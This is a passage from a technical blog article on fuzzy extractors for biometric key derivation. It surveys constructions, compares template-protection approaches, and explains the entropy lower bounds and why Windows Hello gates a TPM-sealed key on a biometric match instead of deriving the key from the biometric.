&lt;p&gt;The continuous-source case is where the consumer biometric story gets ugly: quantising a learned embedding loses entropy in proportion to the quantiser&apos;s resolution, and the residual is the entropy budget the sketch has to work with.&lt;/p&gt;
&lt;h3&gt;6.2 Generation 3a: Boyen 2004 reusable fuzzy extractors&lt;/h3&gt;
&lt;p&gt;Xavier Boyen, about five months after the DRS conference paper, attacked the multi-enrolment problem head on [@boyen-2004-ccs-eprint]. A &lt;em&gt;reusable&lt;/em&gt; fuzzy extractor remains secure when the same source is enrolled multiple times under correlated but different readings $w_1, w_2, \ldots, w_q$. Boyen formalises two threat models. The &lt;em&gt;outsider chosen-perturbation&lt;/em&gt; attack allows the adversary to choose the noise patterns between enrolments; Boyen shows that fuzzy extractors built from XOR-homomorphic sketches (code-offset is one) are secure against outsider adversaries with bounded perturbations. The &lt;em&gt;insider chosen-perturbation&lt;/em&gt; attack additionally gives the adversary access to the extracted keys $R_1, \ldots, R_q$; this stronger model requires a random-oracle assumption. The Canetti-Fuller-Paneth-Reyzin-Smith 2016 paper would later argue that the outsider model&apos;s perturbation class is &quot;unlikely to hold for a practical source,&quot; quoting the paper directly [@cfprs-2016-eprint].&lt;/p&gt;
&lt;h3&gt;6.3 Generation 3b: BDKOS 2005 / DKKRS 2012 tamper-resilient fuzzy extractors&lt;/h3&gt;
&lt;p&gt;A different defect of the DRS construction: the public helper $P$ is not authenticated. If an active adversary can rewrite $P$ on its way to the verifier, the verifier reconstructs the wrong key, and the security analysis falls apart. Xavier Boyen, Yevgeniy Dodis, Jonathan Katz, Rafail Ostrovsky, and Adam Smith addressed this in 2005 with the &lt;strong&gt;tamper-resilient&lt;/strong&gt; fuzzy extractor [@bdkos-2005-eurocrypt]. Their Theorem 1 builds a tamper-detecting secure sketch in the random-oracle model: publish $(\text{pub}^&lt;em&gt;, h)$ where $\text{pub}^&lt;/em&gt;$ is a standard sketch and $h = H(w, \text{pub}^*)$; at recovery, recompute the tag and reject on mismatch. The full tamper-resilient fuzzy extractor (BDKOS §3.2) then composes this tamper-detecting sketch with a strong extractor. The standard-model construction came later, in 2012, from Dodis, Kanukurthi, Katz, Reyzin, and Smith, by replacing the random oracle with an &lt;em&gt;algebraic manipulation detection&lt;/em&gt; (AMD) code, with entropy loss $O(\log(1/\varepsilon))$ above the passive bound [@dkkrs-2012-ieeetit], [@cdfpw-2008-eurocrypt].&lt;/p&gt;
&lt;h3&gt;6.4 Generation 4: Fuller-Meng-Reyzin 2013 computational fuzzy extractors&lt;/h3&gt;
&lt;p&gt;By 2013 the field had hit a wall. The DRS inequality forbids information-theoretic constructions on low-entropy consumer biometrics. Fuller, Meng, and Reyzin asked the obvious next question: does the wall come down if you trade information-theoretic security for computational security? Their answer, in &lt;em&gt;Computational Fuzzy Extractors&lt;/em&gt; at ASIACRYPT 2013, is half negative and half positive [@fmr-2013-asiacrypt-eprint], [@fmr-2020-iandc].&lt;/p&gt;
&lt;p&gt;The negative half: &quot;for every secure sketch that retains $m$ bits of computational entropy, there is an error-correcting code with $2^{m-2}$ codewords&quot; [@fmr-2013-asiacrypt-eprint]. The coding-theory lower bound survives the relaxation to computational HILL pseudoentropy. The positive half: skip the sketch entirely. Treat the biometric reading as an LWE error vector, use a random linear code, and base security on the Learning With Errors problem. The construction extracts a key length equal to the source min-entropy, with security under standard LWE assumptions.&lt;/p&gt;
&lt;h3&gt;6.5 Generation 5: Canetti-Fuller-Paneth-Reyzin-Smith 2016 reusable low-entropy&lt;/h3&gt;
&lt;p&gt;The final piece of the contemporary state of the art is CFPRS 2016 [@cfprs-2016-eurocrypt], [@cfprs-2016-eprint]. Ran Canetti, Benjamin Fuller, Omer Paneth, Leonid Reyzin, and Adam Smith built a fuzzy extractor that is reusable, handles low-entropy distributions, and works under realistic correlated noise. The key technique is &lt;em&gt;per-bit digital lockers&lt;/em&gt;: for each bit of the source, store a digital locker keyed on a random subset of input bits. Recovery samples subsets, queries the lockers, and majority-votes. The construction depends on a digital-locker idealisation, but CFPRS show that any reusable fuzzy extractor for low-entropy sources requires either the random-oracle model or an equivalent strong assumption, which limits the room to remove the idealisation.&lt;/p&gt;
&lt;h3&gt;6.6 The one consumer-biometric construction that ever cleared the bar&lt;/h3&gt;
&lt;p&gt;Across two decades of theoretical work, exactly one published consumer-biometric fuzzy extractor has cleared the DRS bar at production-grade parameters. Hao, Anderson, and Daugman, in a 2005 Cambridge tech report and a 2006 IEEE Transactions on Computers paper, presented an iris fuzzy extractor that &quot;can generate up to 140 bits of biometric key, more than enough for 128-bit AES&quot; with &quot;a 99.5% success rate&quot; on 70 eyes [@hao-anderson-daugman-2005-tr], [@hao-anderson-daugman-2006-ieeetc]. The construction layers a Hadamard code (handles single-bit errors) with a Reed-Solomon code (handles burst errors) inside the code-offset sketch, then runs LHL.The Hao-Anderson-Daugman code is a two-layer Hadamard-then-Reed-Solomon composition. The inner Hadamard layer is HC(6) at rate $7/64 \approx 1/9$ (7 bits encoded into 64 bits per block, 32 blocks per 2048-bit iris code), and absorbs noise within each block; the outer RS(32, 20) over $\text{GF}(2^7)$ tolerates up to six block errors across the 32 blocks. The composition costs more redundancy than a single BCH code but matches the iris noise statistics better. The iris is the only common biometric where the entropy budget is generous enough to absorb that much redundancy and still leave 140 bits over.&lt;/p&gt;
&lt;p&gt;The state of the art, taken together, is wide and mature. Every successor either requires the source to have an entropy profile most consumer biometrics lack, or uses idealisations (random oracle, digital locker, LWE-with-specific-error-distribution) that no production cryptosystem wants to depend on. The next two sections make that boundary precise.&lt;/p&gt;
&lt;h2&gt;7. Competing approaches: six paradigms&lt;/h2&gt;
&lt;p&gt;Step back from the fuzzy-extractor lineage and put it in competitive context. There are at least six distinct approaches to binding cryptographic operations to a biometric, and only two of them &lt;em&gt;derive&lt;/em&gt; a key from the biometric. The other four use the biometric as a &lt;em&gt;gate&lt;/em&gt; on a key generated elsewhere. ISO/IEC 24745:2022 codifies three protection properties -- irreversibility, unlinkability, and renewability -- that any biometric template protection scheme should provide [@iso-iec-24745-2022], and the Rathgeb-Uhl 2011 survey is the open-access reference that maps each approach to the three properties [@rathgeb-uhl-2011].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Representative work&lt;/th&gt;
&lt;th&gt;Derives key?&lt;/th&gt;
&lt;th&gt;Irreversibility&lt;/th&gt;
&lt;th&gt;Unlinkability&lt;/th&gt;
&lt;th&gt;Renewability&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Information-theoretic fuzzy extractor&lt;/td&gt;
&lt;td&gt;Dodis-Reyzin-Smith 2004 family [@dors-2008-siamjc]&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (under min-entropy)&lt;/td&gt;
&lt;td&gt;Hard under correlated re-enrol&lt;/td&gt;
&lt;td&gt;Yes (rotate seed and sketch)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Computational fuzzy extractor&lt;/td&gt;
&lt;td&gt;Fuller-Meng-Reyzin 2013 / CFPRS 2016 [@fmr-2013-asiacrypt-eprint], [@cfprs-2016-eurocrypt]&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (under LWE / digital locker)&lt;/td&gt;
&lt;td&gt;Improved over information-theoretic&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cancelable biometrics&lt;/td&gt;
&lt;td&gt;Ratha-Connell-Bolle 2001 [@ratha-connell-bolle-2001]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (by transform design)&lt;/td&gt;
&lt;td&gt;Yes (transform key)&lt;/td&gt;
&lt;td&gt;Yes (re-enrol under fresh transform)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Homomorphic encryption biometric matching&lt;/td&gt;
&lt;td&gt;Engelsma-Jain-Boddeti HERS [@engelsma-jain-boddeti-hers-arxiv]&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Yes (under HE)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Secure-element match-on-chip&lt;/td&gt;
&lt;td&gt;Apple Secure Enclave [@apple-platform-security], [@apple-secure-enclave]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Hardware-anchored&lt;/td&gt;
&lt;td&gt;Yes (per-device)&lt;/td&gt;
&lt;td&gt;Yes (hardware key rotation)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Match-then-unwrap-TPM-sealed-key&lt;/td&gt;
&lt;td&gt;Windows Hello ESS [@ms-learn-ess], [@ms-learn-hello-business]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Hardware-anchored&lt;/td&gt;
&lt;td&gt;Yes (per-device)&lt;/td&gt;
&lt;td&gt;Yes (rotate TPM-sealed key)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

A class of biometric template protection schemes in which a non-invertible, application-specific transformation $T_i$ is applied to the feature vector before storage. The stored template is then $T_i(\text{features})$; matching is performed in the transformed space; and a compromised template can be revoked by re-enrolling under a fresh transform $T_j$. The goal is *template protection*, not cryptographic key derivation: no uniformly random key falls out of the construction. ISO/IEC 24745 names three properties such a transform must satisfy: irreversibility, unlinkability, and renewability [@ratha-connell-bolle-2001], [@rathgeb-uhl-2011].

The international standard *Information security, cybersecurity and privacy protection -- Biometric information protection* (ISO/IEC 24745:2022 Edition 2, 63 pages, published February 2022 [@iso-iec-24745-2022]) defines three properties of any biometric protection scheme -- irreversibility, unlinkability, renewability -- without prescribing any specific cryptographic primitive. The standard is paywalled at CHF 204, which is why most academic and engineering treatments cite the open-access Rathgeb-Uhl 2011 survey [@rathgeb-uhl-2011] as a proxy for the property definitions. The three properties are deliberately neutral: a fuzzy extractor, a cancelable transform, a homomorphic-encryption matcher, and a hardware-anchored secure element can all in principle satisfy them, and the standard is silent on which is best.
&lt;p&gt;The two &lt;em&gt;derive&lt;/em&gt; approaches (rows 1 and 2 in the table) follow the genealogy this article has been tracing. The remaining four are &lt;em&gt;gate&lt;/em&gt; approaches: each generates the cryptographic key by some independent means -- a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt;-sealed asymmetric key, a Secure Enclave-bound key, a homomorphic-encryption keypair -- and uses the biometric only to decide whether to release the key. The cancelable-biometrics approach is even more conservative: it does not even tie a key to the biometric at all; it only protects the template against compromise.&lt;/p&gt;
&lt;p&gt;Why is the &lt;em&gt;derive&lt;/em&gt; versus &lt;em&gt;gate&lt;/em&gt; distinction so deep? Because it determines who is responsible for the key&apos;s secrecy. In a &lt;em&gt;derive&lt;/em&gt; model, the biometric &lt;em&gt;is&lt;/em&gt; the secret; if the biometric leaks (a photo of your face, a latent print on a glass), the cryptographic key is at risk. In a &lt;em&gt;gate&lt;/em&gt; model, the secret is independent of the biometric -- usually a hardware-anchored private key that never leaves the secure element -- and the biometric is just a soft second factor that decides whether the user is allowed to &lt;em&gt;use&lt;/em&gt; the secret.&lt;/p&gt;
&lt;p&gt;Hardware-anchored &lt;em&gt;gate&lt;/em&gt; schemes also get to rely on attestation: a TPM or Secure Enclave can prove to a remote relying party that the key it just used is bound to a specific device, by a specific user, in a specific authentication ceremony. A pure software fuzzy extractor cannot make any of those claims.&lt;/p&gt;
&lt;p&gt;This is the decisive architectural distinction in the field. Every shipped consumer biometric authenticator on the planet picks &lt;em&gt;gate&lt;/em&gt;. The next two sections explain why: section 8 walks through three theoretical lower bounds that draw the perimeter inside which any fuzzy extractor can live, and section 10 walks through the Windows Hello architecture as the concrete embodiment of &lt;em&gt;gate&lt;/em&gt;.&lt;/p&gt;
&lt;h2&gt;8. Theoretical limits&lt;/h2&gt;
&lt;p&gt;Three lower-bound results, taken together, draw the perimeter inside which any fuzzy extractor can live. The section 5 inequality was the first. Two more come from later papers, and they are sharper than the basic inequality suggests.&lt;/p&gt;
&lt;h3&gt;8.1 The min-entropy floor&lt;/h3&gt;
&lt;p&gt;The DRS section 5 inequality already gives a floor: $\ell \le H_\infty(W) - (n-k) - 2\log(1/\varepsilon) + 2$. Fuller, Reyzin, and Smith in 2020 sharpened this with an impossibility result for &lt;em&gt;universal&lt;/em&gt; information-theoretic fuzzy extractors.&lt;/p&gt;
&lt;p&gt;They define a stronger notion they call &lt;em&gt;fuzzy min-entropy&lt;/em&gt;, $H^{\text{fuzz}}&lt;em&gt;{t,\infty}(W) := -\log \max&lt;/em&gt;{w_0} \Pr[W \in \mathcal{B}&lt;em&gt;t(w_0)]$, and prove that the gap between the universal-construction bound $H&lt;/em&gt;\infty(W) - \log|\mathcal{B}&lt;em&gt;t|$ and the optimal bound $H^{\text{fuzz}}&lt;/em&gt;{t,\infty}(W)$ can be a large fraction of $n$ bits. For Daugman&apos;s iris parameters ($n = 2048$, $H_\infty \approx 249$, $\log|\mathcal{B}_t| \approx 1024$), the universal bound sits more than 1000 bits below the fuzzy-min-entropy upper bound -- a gap of $\approx 0.5n$ -- and Theorem 5.1&apos;s impossibility region pushes the worst-case gap up toward $h_2(\tau) \cdot n$ for higher noise rates [@frs-2020-ieeetit]. The implication: a single universal construction cannot extract the optimal key length from every high-fuzzy-min-entropy source; some sources require source-specific constructions to close the gap, and the DRS bound is essentially tight in the worst case.&lt;/p&gt;
&lt;p&gt;Plug realistic numbers into the floor. The table below is the empirical perimeter the cryptographic community has lived inside for two decades.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Approx. raw entropy&lt;/th&gt;
&lt;th&gt;Effective entropy under correlated noise&lt;/th&gt;
&lt;th&gt;Clears DRS bar at $\varepsilon = 2^{-80}$ for 128-bit key?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Iris [@daugman-2003-pdf], [@daugman-2004-csvt]&lt;/td&gt;
&lt;td&gt;~249 dof&lt;/td&gt;
&lt;td&gt;~249 dof (matched-illumination scans)&lt;/td&gt;
&lt;td&gt;Yes (demonstrated [@hao-anderson-daugman-2006-ieeetc])&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fingerprint minutiae [@pankanti-prabhakar-jain-2002]&lt;/td&gt;
&lt;td&gt;~70 bits at best image quality&lt;/td&gt;
&lt;td&gt;40-70 bits depending on sensor&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Face deep-feature embeddings&lt;/td&gt;
&lt;td&gt;30-50 bits raw&lt;/td&gt;
&lt;td&gt;Often much less under illumination / pose&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SRAM PUF [@intrinsic-id-sram-puf], [@tuyls-skoric-kevenaar-2007-springer]&lt;/td&gt;
&lt;td&gt;thousands of bits (entire SRAM page)&lt;/td&gt;
&lt;td&gt;thousands of bits (controlled noise)&lt;/td&gt;
&lt;td&gt;Yes (deployed in over a billion devices)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Watch Daugman&apos;s 249 figure carefully. It is the number of degrees of freedom in the &lt;em&gt;Hamming distance distribution&lt;/em&gt; between IrisCodes from different irises, fit to a fractional binomial with $N = 249$ and $p = 0.5$. It is not the raw min-entropy of an iris image: an iris sensor returning 249 bits of high-quality iris data is &lt;em&gt;not&lt;/em&gt; the same as 249 bits of min-entropy. Daugman&apos;s 2003 Pattern Recognition paper makes the distinction explicitly [@daugman-2003-pdf].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Across every consumer biometric the industry has deployed, the iris is unique in clearing the DRS bar at production parameters. Daugman&apos;s 249 statistical degrees of freedom give the iris a budget more than three times the budget of fingerprint, and an order of magnitude more than face. Hao, Anderson, and Daugman 2006 demonstrate a 140-bit iris key with 99.5% success on 70 eyes [@hao-anderson-daugman-2006-ieeetc] -- the only published consumer-biometric fuzzy extractor ever to clear the DRS bar at production parameters. The catch: iris sensors are intrusive, expensive, and rarely shipped in consumer phones or laptops.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;8.2 Reusability impossibility&lt;/h3&gt;
&lt;p&gt;Boyen&apos;s 2004 insider chosen-perturbation game is unconditionally insecure for adversaries who can choose enough perturbations [@boyen-2004-ccs-eprint]. CFPRS 2016 cite this impossibility result and work around it by restricting attention to a digital-locker-amenable source class [@cfprs-2016-eprint]. The practical implication is that any fuzzy extractor that wants to be reusable across many enrolments has to either (a) restrict the source class (CFPRS&apos;s path) or (b) accept a security degradation per re-enrol. Neither option is appealing for a consumer device that may see its user re-enrol after every kernel update, every sensor recalibration, or every routine credential rotation.&lt;/p&gt;
&lt;h3&gt;8.3 Active-adversary lower bound&lt;/h3&gt;
&lt;p&gt;A passive adversary sees the helper $P$ but does not modify it; an active adversary can rewrite $P$ between enrolment and recovery. BDKOS 2005 and DKKRS 2012 prove that protecting against active adversaries requires either a one-time setup secret (a shared seed established out of band), an authenticated channel between enrolment and recovery, or a min-entropy surplus of $\Omega(\log(1/\varepsilon))$ above the passive bound [@bdkos-2005-eurocrypt], [@dkkrs-2012-ieeetit]. For $\varepsilon = 2^{-80}$, the active-adversary surcharge is 80 bits.&lt;/p&gt;
&lt;h3&gt;8.4 Combining the three bounds&lt;/h3&gt;
&lt;p&gt;Stack the three bounds on top of each other for a consumer face / fingerprint source. The min-entropy floor is the hardest barrier: with 40 to 80 effective bits and 160 bits of security-parameter cost plus 100-plus bits of code redundancy, the extractable key length is negative. The reusability impossibility forecloses the workaround of pretending that re-enrolments are uncorrelated -- they are not, because real biometric drift is highly correlated. The active-adversary bound forecloses the workaround of pretending the helper data is safe in transit. A software-only fuzzy extractor cannot meet a consumer-OS security bar at consumer biometric quality. What you do &lt;em&gt;instead&lt;/em&gt; is the next section.&lt;/p&gt;
&lt;h2&gt;9. Open problems&lt;/h2&gt;
&lt;p&gt;Four problems remain, ordered by how directly each one blocks deployment in a Windows Hello-class product.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. &lt;strong&gt;Deployable face / fingerprint fuzzy extractors under realistic correlated noise.&lt;/strong&gt; Engelsma, Cao, and Jain&apos;s 2019 &lt;em&gt;DeepPrint&lt;/em&gt; reduces intra-user fingerprint variance via learned representations [@engelsma-cao-jain-2019-arxiv], but no published construction has cleared the DRS bar on a realistic test set under correlated noise. 2. &lt;strong&gt;Reusable computational fuzzy extractors without idealisations.&lt;/strong&gt; CFPRS 2016 uses digital lockers, which require either a random oracle or an equivalent strong assumption [@cfprs-2016-eurocrypt]. Eliminating that idealisation is open. 3. &lt;strong&gt;Post-quantum information-theoretic fuzzy extractors.&lt;/strong&gt; Fuller-Meng-Reyzin&apos;s LWE-based construction is already post-quantum on the computational side [@fmr-2013-asiacrypt-eprint], [@fmr-2020-iandc], but an information-theoretic construction tailored to PQ-style noise distributions is open. 4. &lt;strong&gt;The PUF-to-biometric architectural gap.&lt;/strong&gt; Fuzzy extractors are deployed &lt;em&gt;only&lt;/em&gt; for PUFs (Synopsys PUF IP (including QuiddiKey), over a billion devices [@intrinsic-id-sram-puf]) where the noise model is controlled. Closing the architectural gap to consumer biometrics, where the noise model is adversarial and environmental, is open.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each of these is hard, and none has a credible path to a consumer-OS-grade deployment in the next product cycle. Take them one at a time.&lt;/p&gt;
&lt;p&gt;The first is the most obviously blocking. Even if every fingerprint sensor in the world tomorrow began returning DeepPrint embeddings instead of minutiae sets, the entropy budget would still be tens of bits below the DRS bar. The bottleneck is the source distribution, not the encoder. Improving the encoder helps -- a learned representation with lower intra-user variance shifts the noise distribution toward zero, which lets you use a code with less redundancy -- but the inequality still bites. The community&apos;s working belief is that no consumer fingerprint sensor will ever ship enough min-entropy to clear the bar at the security parameter an OS authenticator demands.&lt;/p&gt;
&lt;p&gt;The second is more nuanced. Digital lockers are &lt;em&gt;useful&lt;/em&gt; in practice -- they are the central tool that lets CFPRS 2016 handle reusability for low-entropy sources -- but they depend on the random-oracle model. The random-oracle model is fine for theoretical work; it is uncomfortable for a production cryptosystem that has to survive an FIPS evaluation and a NIST audit. The hope is that &lt;em&gt;non-malleable extractors&lt;/em&gt; or &lt;em&gt;correlation-resistant universal hash families&lt;/em&gt; can replace digital lockers in the CFPRS construction without losing the reusability guarantee. Promising directions exist; none has matured into a deployable construction.&lt;/p&gt;
&lt;p&gt;The third sounds esoteric but matters. The information-theoretic DRS construction has been quietly post-quantum since 2004: the LHL holds against quantum adversaries up to a constant factor, and BCH decoding is classical [@dors-2008-siamjc]. But once you move to the &lt;em&gt;computational&lt;/em&gt; fuzzy extractors of FMR 2013 or CFPRS 2016, the security argument depends on a hardness assumption (LWE or digital-locker-as-RO) that one wants to be confident survives the post-quantum transition. LWE is widely believed to be PQ-secure; digital lockers are not yet rigorously analysed against quantum adversaries.&lt;/p&gt;
&lt;p&gt;The fourth, &lt;strong&gt;the PUF-to-biometric gap&lt;/strong&gt;, is where the theoretical and engineering communities meet most uncomfortably. The fuzzy extractor &lt;em&gt;works&lt;/em&gt; in practice: Synopsys PUF IP (including QuiddiKey) embeds a code-offset / syndrome-based fuzzy extractor in over a billion devices, &quot;deployed and proven in over a billion devices certified by EMVCo, Visa, CC EAL6+, PSA, ioXt, and governments across the globe&quot; per the vendor [@intrinsic-id-sram-puf]. The SRAM PUF has thousands of bits of min-entropy and a controlled noise model: powering up the SRAM gives a startup pattern that is reliable across temperature and voltage swings to within a few percent of bits. The signal-to-noise ratio is dramatically better than any consumer biometric.Pierre-Alain Dupont, Julia Hesse, David Pointcheval, Leonid Reyzin, and Sophia Yakoubov&apos;s 2018 EUROCRYPT paper &lt;em&gt;Fuzzy Password-Authenticated Key Exchange&lt;/em&gt; [@dupont-hesse-pointcheval-reyzin-yakoubov-2018] is a recent direction that decouples fuzzy extraction from key agreement: rather than extract a key once and use it, two parties run a password-authenticated key exchange whose &quot;password&quot; is a noisy biometric. Fuzzy PAKE sidesteps the helper-data leakage problem because the helper is consumed inside an interactive protocol that does not commit it to long-term storage.&lt;/p&gt;

The bright line between PUF and biometric is the *noise model*. An SRAM PUF lives in a single device, sees temperature and voltage variation between $-40^\circ$C and $+85^\circ$C, and operates against an adversary who can read the SRAM but cannot rewrite the silicon. The noise distribution is empirically measurable, and the entropy budget is enormous -- thousands of bits per page. A consumer fingerprint sensor, by contrast, lives outside the trust boundary: the noise distribution depends on skin moisture, sensor cleanliness, finger angle, and an adversary who can lift a latent print from a glass. The fuzzy-extractor framework is the right answer for the PUF case and the wrong answer for the consumer biometric case, and the difference is the noise model, not the cryptography.
&lt;p&gt;Each of these problems is interesting on its own merits, but none of them has a credible path to a consumer-OS-grade deployment in the next product cycle. So what does a consumer OS &lt;em&gt;actually&lt;/em&gt; do? That is the punchline.&lt;/p&gt;
&lt;h2&gt;10. The punchline: why Windows Hello does not use a fuzzy extractor&lt;/h2&gt;
&lt;p&gt;State the claim flatly. Windows Hello, in every shipping configuration since Enhanced Sign-in Security was introduced with Windows 11, performs &lt;strong&gt;match-then-unwrap&lt;/strong&gt;, not &lt;strong&gt;derive-from-biometric&lt;/strong&gt;. The biometric is a gate, not an input to key derivation. The cryptographic credential a Windows Hello user authenticates with is a TPM-bound asymmetric keypair generated independently during provisioning; the biometric matcher merely decides whether to authorise the TPM to use that key. The full architecture is documented verbatim in Microsoft Learn&apos;s Enhanced Sign-in Security and Windows Hello for Business pages [@ms-learn-ess], [@ms-learn-hello-business].&lt;/p&gt;
&lt;h3&gt;10.1 Enrolment&lt;/h3&gt;
&lt;p&gt;When a Windows user enrols a face or a fingerprint, the biometric data path runs inside a Virtualisation-Based Security (VBS) &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;trustlet&lt;/a&gt;, not in the kernel and not in the camera driver. Microsoft&apos;s documentation is explicit:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;When ESS is enabled, the face algorithm is protected using VBS ... The hypervisor allows the face camera to write to these memory regions providing an isolated pathway to deliver face data from the camera to the face matching algorithm&quot; [@ms-learn-ess].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The face image never lands in regular kernel memory. It is delivered by the hypervisor into a memory region readable only by the VBS-resident face-matching trustlet, which extracts a feature template, encrypts it with VBS-only keys, and writes the encrypted blob to disk. For fingerprint, ESS supports only sensors with on-device matching: &quot;ESS is only supported on fingerprint sensors with match on sensor capabilities&quot; [@ms-learn-ess]. The sensor itself runs the matcher and never exposes the template to the host operating system.&lt;/p&gt;

A user-mode process that runs inside Virtual Trust Level 1 (VTL 1) on Windows, isolated from the normal-world kernel (VTL 0) by the Hyper-V hypervisor. Trustlets are the unit of code that the Secure Kernel hosts and that VBS-protected operations execute inside. Examples include the LSA Isolated process (Credential Guard) and the biometric matcher (Windows Hello with Enhanced Sign-in Security) [@ms-learn-ess].
&lt;p&gt;In parallel, the &lt;em&gt;credential&lt;/em&gt; the user will actually authenticate with is generated. Microsoft Learn&apos;s Windows Hello for Business page describes this verbatim: &quot;The provisioning flow requires a second factor of authentication before it can generate a public/private key pair. The public key is registered with the IdP, mapped to the user account&quot; [@ms-learn-hello-business]. The private key never leaves the TPM. It is sealed against a TPM policy that requires the boot integrity to be intact, the user account to be the same, and the VBS-resident biometric matcher to have signalled a match success. The keypair is a per-user, per-device, per-IdP credential; nothing about it is a function of the user&apos;s biometric.&lt;/p&gt;
&lt;h3&gt;10.2 Authentication&lt;/h3&gt;
&lt;p&gt;At authentication time, the user presents a face or a finger; the VBS-resident matcher compares the live template to the stored template; on success, the matcher signals the TPM via a secure channel to unwrap the asymmetric private key for use in an IdP challenge response. The Microsoft documentation states the architecture in two sentences:&lt;/p&gt;

The Windows biometric components running in VBS establish a secure channel to the TPM ... When a matching operation is a success, the biometric components in VBS use the secure channel to authorize the usage of Windows Hello keys for authenticating the user with their identity provider, applications, and services. -- Microsoft Learn, Windows Hello Enhanced Sign-in Security [@ms-learn-ess]
&lt;p&gt;The authentication ceremony itself is described in the Windows Hello for Business page: &quot;Regardless of the gesture used, authentication occurs using the private portion of the Windows Hello for Business credential. The IdP validates the user identity by mapping the user account to the public key registered during the provisioning phase&quot; [@ms-learn-hello-business]. The IdP sees a cryptographic proof that the user-registered TPM-bound key signed the challenge; it never sees anything that depends on the biometric.&lt;/p&gt;

flowchart LR
    subgraph &quot;DRS fuzzy extractor (theoretical)&quot;
        D1[&quot;Read biometric w&quot;] --&amp;gt; D2[&quot;Gen(w) -&amp;gt; (R, P)&quot;]
        D2 --&amp;gt; D3[&quot;Store helper P on disk&quot;]
        D2 --&amp;gt; D4[&quot;Use R as key&quot;]
        D5[&quot;Re-read w&apos; near w&quot;] --&amp;gt; D6[&quot;Rep(w&apos;, P) -&amp;gt; R&quot;]
        D6 --&amp;gt; D7[&quot;Use R as key&quot;]
    end
    subgraph &quot;Windows Hello (production)&quot;
        W1[&quot;Read biometric w in VBS&quot;] --&amp;gt; W2[&quot;Compute template T&quot;]
        W2 --&amp;gt; W3[&quot;Encrypt and store T with VBS-only key&quot;]
        W4[&quot;Generate TPM-bound keypair (sk, pk)&quot;] --&amp;gt; W5[&quot;Register pk with IdP&quot;]
        W4 --&amp;gt; W6[&quot;Seal sk to TPM with policy&quot;]
        W7[&quot;Re-read w&apos; in VBS&quot;] --&amp;gt; W8[&quot;Match w&apos; against T&quot;]
        W8 --&amp;gt; W9[&quot;Authorise TPM unwrap via secure channel&quot;]
        W6 --&amp;gt; W9
        W9 --&amp;gt; W10[&quot;TPM signs IdP challenge with sk&quot;]
    end
&lt;h3&gt;10.3 Why this is the right design&lt;/h3&gt;
&lt;p&gt;Map each architectural choice to a fuzzy-extractor limit from section 8.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The min-entropy gap is real.&lt;/strong&gt; Face and fingerprint min-entropy under correlated real-world noise is below the DRS bar for any cryptographically meaningful key length at the security parameter an OS authenticator must hit. Section 5&apos;s inequality forbids the construction; no amount of clever engineering moves the constants. Microsoft&apos;s engineers, when faced with the choice between deriving a 128-bit key from a 40-bit source and binding the key to a TPM, made the only choice the math allows.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Helper-data leakage compounds under re-enrolment.&lt;/strong&gt; Every time a user re-enrols (new device, sensor recalibration, post-incident credential refresh), a new helper string would be published. Simoens, Tuyls, and Preneel established that correlated code-offset helpers link and reverse [@simoens-tuyls-preneel-2009]. Hardware-anchored match-then-unwrap rotates the TPM-sealed asymmetric key under standard key-management rules instead, sidestepping the cryptographic reusability problem entirely. Key rotation under a hardware root of trust is a solved problem; reusability in a software fuzzy extractor remains an active research area.&lt;/p&gt;
